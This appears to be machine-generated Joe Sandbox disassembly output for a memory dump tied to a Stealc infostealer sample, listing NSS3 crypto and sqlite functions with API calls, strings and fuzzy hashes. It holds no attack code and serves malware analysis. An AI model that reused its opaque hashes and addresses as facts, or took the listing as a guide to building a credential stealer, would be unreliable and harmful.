Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: ad21a0c5de2ce8b98880fdb78bac43357f7a80592fca456d80718b67df13bdf0
Instruction ID: f37c2a349b94c63f4405a041f497cedeb051a19280765bffa2a28556119a2d7d
Opcode Fuzzy Hash: ad21a0c5de2ce8b98880fdb78bac43357f7a80592fca456d80718b67df13bdf0
Instruction Fuzzy Hash: 6312F2706083118FD721CF59C59461AB7F2BF85718F18AD6DE8898BB52C735E84ACBC2

Function 6C92DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C907FFA,00000000,?,6C9323B9,00000002,00000000,?,6C907FFA,00000002), ref: 6C92DE33

Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590AB
Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590C9
Part of subcall function 6C959090: EnterCriticalSection.KERNEL32 ref: 6C9590E5
Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C959116
Part of subcall function 6C959090: LeaveCriticalSection.KERNEL32 ref: 6C95913F

Part of subcall function 6C92D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C92DE74,6C907FFA,00000002,?,?,?,?,?,00000000,6C907FFA,00000000,?,6C9323B9,00000002), ref: 6C92D008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C907FFA,00000000,?,6C9323B9,00000002,00000000,?,6C907FFA,00000002), ref: 6C92DE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6C92DEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C92E069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C92E121
PK11_FreeSymKey.NSS3(?), ref: 6C92E14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C92E195
PR_GetCurrentThread.NSS3 ref: 6C92E1FC

Part of subcall function 6C922460: PR_SetError.NSS3(FFFFE005,00000000,6C9C7379,00000002,?), ref: 6C922493

Strings

handshake data, xrefs: 6C92DFF7
application data, xrefs: 6C92DFE0
key, xrefs: 6C92E046
early application data, xrefs: 6C92DFC9

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: 2ce0e83a1796f5ac2ed208e0f06baaaf147c46343de99251fd404b88da94bd5d
Instruction ID: 60cd895b184ef6131134b4513f2639b1d58bf66535734c85cf0dfb37695c4043
Opcode Fuzzy Hash: 2ce0e83a1796f5ac2ed208e0f06baaaf147c46343de99251fd404b88da94bd5d
Instruction Fuzzy Hash: B9C10371A102159BDB14CF79C8C0BEAB7B8FF19309F144138E8499BB59E335E954CBA1

Function 6C8B7D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C8B7DDC

Part of subcall function 6C8F07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C898298,?,?,?,6C88FCE5,?), ref: 6C8F07BF
Part of subcall function 6C8F07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8F07E6
Part of subcall function 6C8F07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F081B
Part of subcall function 6C8F07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F0825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C8B7DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C8B7F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C8B7F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C8B7F98
PK11_FreeSymKey.NSS3(?), ref: 6C8B7FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8B7FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C8B8000

Part of subcall function 6C8D9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C8B7F0C,?,00000000,00000000,00000000,?), ref: 6C8D943B
Part of subcall function 6C8D9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C8D946B
Part of subcall function 6C8D9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C8D9546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8B8110
PK11_FreeSymKey.NSS3(00000000), ref: 6C8B811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C8B822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C8B823C

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: eef4890ea04ad9240948b9b7cf8cc99426e8e98790b72d2350d74a816408aae1
Instruction ID: 2fc08ddfdcc951b62c71fb190c5b0698a09fa9a8114b24771ae07b94d4e1a9e9
Opcode Fuzzy Hash: eef4890ea04ad9240948b9b7cf8cc99426e8e98790b72d2350d74a816408aae1
Instruction Fuzzy Hash: 72C15EB1D402599FEB31CF14CD40BEAB7B9AF05348F0489A9E91DB6641E7319E858FA0

Function 6C8C0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C8C0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C8C0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C8C1006
PK11_FreeSymKey.NSS3(?), ref: 6C8C101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8C1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8C103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C8C1048
memcpy.VCRUNTIME140(?,?,?), ref: 6C8C108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C8C10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C8C10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C8C112E

Part of subcall function 6C8C1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C8C08C4,?,?), ref: 6C8C15B8
Part of subcall function 6C8C1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C8C08C4,?,?), ref: 6C8C15C1
Part of subcall function 6C8C1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8C162E
Part of subcall function 6C8C1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8C1637

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: f5bbb00d549255c78ea73512c0678f5774480509a9fd58b607d7d112a68aa250
Instruction ID: aabe149a55ee6ef3e94f9b3050882d448f7203ada32ad27df877eba7d27155f1
Opcode Fuzzy Hash: f5bbb00d549255c78ea73512c0678f5774480509a9fd58b607d7d112a68aa250
Instruction Fuzzy Hash: 8371D3B1A002058FDB24CFA9DEC4A6AF7F1BF88318F148A2DE50997751E731D945CB92

Function 6C8E1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C8E1F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C8E2166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C8E228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C8E23B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C8E241C

Strings

serial, xrefs: 6C8E22A2
manufacturer, xrefs: 6C8E2179
token, xrefs: 6C8E1F2C
model, xrefs: 6C8E23CB, 6C8E23EC

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 3df00e7443d32bd7b14c5c79b95eeadfb88ad6da076b12c5fdb1388da11578a8
Instruction ID: 7764e47636614a8f46ecaa4da184a1d09b819dd98aacd25b38c5d840b88029bc
Opcode Fuzzy Hash: 3df00e7443d32bd7b14c5c79b95eeadfb88ad6da076b12c5fdb1388da11578a8
Instruction Fuzzy Hash: 9D020262E0C7C96EF7328671C54C3D7BAE09B4B328F0C1A6DC5EE46683C7AC59498791

Function 6C8E6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C891C6F,00000000,00000004,?,?), ref: 6C8E6C3F

Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C891C6F,00000000,00000004,?,?), ref: 6C8E6C60
PR_ExplodeTime.NSS3(00000000,6C891C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C891C6F,00000000,00000004,?,?), ref: 6C8E6C94

Strings

gfff, xrefs: 6C8E6D30
gfff, xrefs: 6C8E6CF5
gfff, xrefs: 6C8E6CFD
gfff, xrefs: 6C8E6D9C
gfff, xrefs: 6C8E6D66

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: f2a3c641d88b6cf8a106efbd8bdfa5a536bf0b549b39257b427fe8611318f031
Instruction ID: f525303f68ab1b876fe71216b4e2f7666d78e2dcc225e08e30a3e79f37784338
Opcode Fuzzy Hash: f2a3c641d88b6cf8a106efbd8bdfa5a536bf0b549b39257b427fe8611318f031
Instruction Fuzzy Hash: 76514B72B016494FC718CDADDC526DEB7DAABE5310F48C23AE842DB781D638D906C751

Function 6C82AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C94CF46,?,6C81CDBD,?,6C94BF31,?,?,?,?,?,?,?), ref: 6C82B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C94CF46,?,6C81CDBD,?,6C94BF31), ref: 6C82B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C94CF46,?,6C81CDBD,?,6C94BF31), ref: 6C82B0A2
CloseHandle.KERNEL32(?,?,6C94CF46,?,6C81CDBD,?,6C94BF31,?,?,?,?,?,?,?,?,?), ref: 6C82B100
sqlite3_free.NSS3(?,?,00000002,?,6C94CF46,?,6C81CDBD,?,6C94BF31,?,?,?,?,?,?,?), ref: 6C82B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C94CF46,?,6C81CDBD,?,6C94BF31), ref: 6C82B12D

Part of subcall function 6C819EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C82C6FD,?,?,?,?,6C87F965,00000000), ref: 6C819F0E
Part of subcall function 6C819EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C87F965,00000000), ref: 6C819F5D

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 97e6ff718c1f5d0f0c90e994dfa0256e3c34099e23f04bc803cea82c99a6568b
Instruction ID: 9b86494d801166fce3289b172592b1592da392fecac87d7ad91ce13193e67aca
Opcode Fuzzy Hash: 97e6ff718c1f5d0f0c90e994dfa0256e3c34099e23f04bc803cea82c99a6568b
Instruction Fuzzy Hash: 3D91B7B1A08205CFDB24CF29DA88ABBB7F1FF45304F244A2DD41697A50E739E594CB91

Function 6C8FBD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C8FBD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C8FBD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C8FBD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C8FBD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C8FBDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C8FBDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C8FBDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C8FBE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C8FBE1E

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: a1944de77150b0a92d9c3ccd9f8201e57281be9b035694f563a6427b3d6c86ff
Instruction ID: 7bf778d7f118b4fde7c72f5ee04f25f02dfd22310b3b434845843bb0edb0b462
Opcode Fuzzy Hash: a1944de77150b0a92d9c3ccd9f8201e57281be9b035694f563a6427b3d6c86ff
Instruction Fuzzy Hash: 6721F776F042895BFB205656DE43FAB37749B917CEF0C0824F936EE641F310E41682A2

Function 6C9A8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C9F14E4,6C95CC70), ref: 6C9A8D47
PR_GetCurrentThread.NSS3 ref: 6C9A8D98

Part of subcall function 6C880F00: PR_GetPageSize.NSS3(6C880936,FFFFE8AE,?,6C8116B7,00000000,?,6C880936,00000000,?,6C81204A), ref: 6C880F1B
Part of subcall function 6C880F00: PR_NewLogModule.NSS3(clock,6C880936,FFFFE8AE,?,6C8116B7,00000000,?,6C880936,00000000,?,6C81204A), ref: 6C880F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C9A8E7B
htons.WSOCK32(?), ref: 6C9A8EDB
PR_GetCurrentThread.NSS3 ref: 6C9A8F99
PR_GetCurrentThread.NSS3 ref: 6C9A910A

Strings

%u.%u.%u.%u, xrefs: 6C9A8E74

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 8ec078219ade9dd6814d0a8d6f3449f695bca4cf36091d4da8f0d08234164d5d
Instruction ID: 93416b863d2decb21cb84a74933464e715fb91159022fba3dd3b70519c5b6adc
Opcode Fuzzy Hash: 8ec078219ade9dd6814d0a8d6f3449f695bca4cf36091d4da8f0d08234164d5d
Instruction Fuzzy Hash: 1F029C319092918FDB18CF59C46876ABBB7FF42308F1A825ED8915FA91C336DA47C790

Function 6C969D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C828637,?,?), ref: 6C969E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C828637), ref: 6C969ED6

Strings

%s at line %d of [%.10s], xrefs: 6C969ECF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C969EC0
database corruption, xrefs: 6C969ECA

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 85914c7746c42b5791ed6e02b38cef5a1c624a8e927eff1b3eefee9d3fcc8280
Instruction ID: b5b3d3455321b3eb889789ce1cf715e6446258623b51c057df0f3ae07c02f7de
Opcode Fuzzy Hash: 85914c7746c42b5791ed6e02b38cef5a1c624a8e927eff1b3eefee9d3fcc8280
Instruction Fuzzy Hash: 8381D531B012158FEB04CFABC980ADEB3F6EF49304B568569E915ABB81E730ED55CB50

Function 6C8F9EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C8F9ED6

Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C8F9EE4

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8F9F38

Part of subcall function 6C8FD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C8F9F0B), ref: 6C8FD03B
Part of subcall function 6C8FD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C8FD04E
Part of subcall function 6C8FD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C8FD07B
Part of subcall function 6C8FD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C8FD08E
Part of subcall function 6C8FD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C8FD09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8F9F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C8F9F59

Part of subcall function 6C8F9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C8F9C5B), ref: 6C8F9D82
Part of subcall function 6C8F9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C8F9C5B), ref: 6C8F9DA9
Part of subcall function 6C8F9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C8F9C5B), ref: 6C8F9DCE
Part of subcall function 6C8F9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C8F9C5B), ref: 6C8F9E43

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: fedbee9fcfc2f04cbdaaa21e800d80eb3fec380ec2b6fccb906345603d43b4e1
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: 5E112EB5F042015BF7309E69DD0079B7354EF943CCF140635E529D7740FB62E91A8692

Function 6C9ACDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9AD086
PR_Malloc.NSS3(00000001), ref: 6C9AD0B9
PR_Free.NSS3(?), ref: 6C9AD138

Strings

>, xrefs: 6C9ACF5B

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
